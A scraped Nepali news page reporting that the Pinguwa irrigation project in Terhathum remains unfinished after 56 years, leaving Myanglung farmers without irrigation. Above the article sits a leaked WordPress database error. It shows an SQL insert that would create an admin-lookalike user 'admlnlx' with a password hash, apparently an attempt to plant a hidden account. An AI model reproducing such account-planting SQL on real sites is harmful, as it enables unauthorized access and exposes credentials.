WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc/EOTPKB3.0KgFbKeaJUjbqwRgyMv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 04:03:26', '', 'admlnlx', 'admlnlx')
तेह्रथुम, पुस २६ –
निर्माण सुरु भएको ५६ वर्ष बितिसक्दा पनि तेह्रथुमको पिंंगुवा सिँचाइ आयोजना पूरा नहँुदा म्याङलुङ नगरपालिकाका किसान सिँचाइ सुविधाबाट वञ्चित भएका छन् ।
विसं २०१६ मा निर्माण सुरु भएको १८ किलोमिटर लामो यो आयोजना निर्माणका लागि स्थानीयले माग गरेपनि सुनुवाइ नभएको साव्ला गाविसका पूर्व अध्यक्ष एवम् पिंगुवा सिँचाइ आयोजनाका अध्यक्ष अभिनारायण लिम्बूले बताउनुभयो ।
आयोजनास्थलमै आएर दुईवर्ष अघि पूर्वसिँचाइमन्त्री एनपी साउदले आयोजनाको काम तत्कालै सुरु गर्ने आश्वासन दिनुभएको थियो । तर त्यसयता कुनै काम नभएको स्थानीयको भनाइ छ । अठार किलोमिटर लामो कुलो भएको यो आयोजना निर्माणका लागि रु ५५ करोड खर्च हुने सिँचाइ विकास डिभिजन कार्यालय तेह्रथुमले जनाएको छ ।
आयोजना सम्पन्न भएमा म्याङलुङ नगरपालिकाको एक हजार ७०० हेक्टर क्षेत्रफल जमिन सिँचाइ हुने कार्यालयले जनाएको छ । – रासस